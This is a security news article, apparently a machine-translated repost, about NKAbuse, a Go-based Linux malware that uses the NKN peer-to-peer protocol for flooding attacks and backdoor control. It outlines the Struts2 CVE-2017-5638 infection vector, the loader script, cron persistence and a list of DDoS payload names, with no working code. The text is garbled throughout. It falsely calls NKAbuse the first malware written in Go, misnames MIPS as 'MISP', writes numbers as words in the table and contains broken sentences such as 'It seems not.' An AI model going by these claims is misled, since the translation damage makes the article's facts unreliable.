New NKAbuse malware exploits NKN decentralized P2P network protocol
December 16, 2023
Experts have discovered a new Go-based multiplatform malware tracked as NKAbuse. This is the first malware to exploit NKN technology.
Researchers from Kaspersky Lab’s Global Emergency Response Team (ghat) and GReAT have discovered a new multiplatform malware called NKAbuse. The malicious code is written in the Go language, making it the first malware to rely on the Go language. NKN Technology For data exchange between peers. Malicious code can target a variety of architectures and supports both flooder and backdoor functionality.
NKAbuse’s primary target is Linux desktops, but it can also target MISP and ARM architectures.
NKN (New Kind of Network) is a decentralized peer-to-peer network protocol that relies on blockchain technology. This protocol enables secure and low-cost data transfer. It is designed to address the limitations of the current Internet infrastructure, which is centralized, inefficient, and prone to censorship.
Individuals can voluntarily join the NKN network and run nodes.Currently consists of over 60,000 nodes
Read “Historically, malware operators have exploited emerging communication protocols like NKN to link with command and control servers (C2) and botmasters.” report Published by Kaspersky. “This threat exploits the NKN public blockchain protocol to perform large-scale flooding attacks and act as a backdoor within Linux systems.”
Experts believe the attackers targeted financial companies by exploiting an old Struts2 vulnerability tracked as CVE-2017-5638.
An attacker could exploit this vulnerability to execute commands on the server by passing the commands in a header labeled “shell” and sending the instructions to Bash for execution. If exploited, it will execute commands on the system and download the initial script.
Researchers found that the malware lacked a self-propagation mechanism, meaning the initial infection vector was delivered by exploiting a sample deployment vulnerability.
Attackers typically install malware by running a remote shell script that downloads and executes the contents of the setup.sh shell script that hosts the remote server. The malicious code checks the OS type and launches the second stage malware (“app_linux_{ARCH}”), which is the actual malware implant and is hosted on the same server. The samples discovered by Kaspersky support the following architectures:
- 386
- arm 64
- arm
- amd64
- mip
- Mipsel
- mips 64
- mips64el
NKAbuse uses cron jobs to maintain persistence.
This malware supports multiple distributed denial of service (DDoS) attacks. Below is a list of flood payloads.
instructions | attack |
Default/0 | http_flood_HTTPGetFloodPayload |
1 | http_flood_HTTPPostFloodPayload |
2 | tcp_flood_TCPFloodPayload |
3 | udp_flood_UDPFloodPayload |
Four | ping_flood_PINGFloodPayload |
Five | tcp_syn_flood_TCPSynFloodPayload |
6 | ssl_flood_SSLFloodPayload |
7 | http_slowloris_HTTPSlowloris payload |
8 | http_slow_body_HTTPSlowBodyPayload |
9 | http_slow_read_HTTPSlowReadPayload |
Ten | icmp_flood_ICMPFloodPayload |
11 | dns_nxdomain_DNSNXDOMAINPayload |
NKAbuse also supports multiple backdoor features that turn it into a powerful remote access Trojan (RAT).
“Although relatively rare, new cross-platform flooders and backdoors like NKAbuse stand out by utilizing less common communication protocols. “While it appears to have been carefully crafted, it can also be adapted to function as a backdoor on certain hosts,” the report concludes. “Furthermore, the use of blockchain technology ensures both authenticity and anonymity. This indicates the potential for this botnet to grow steadily over time, with an identifiable central controller. It seems not.”
Follow us on Twitter: @securityaffairs and Facebook and mastodon
(Security related matters – hacking, ransomware)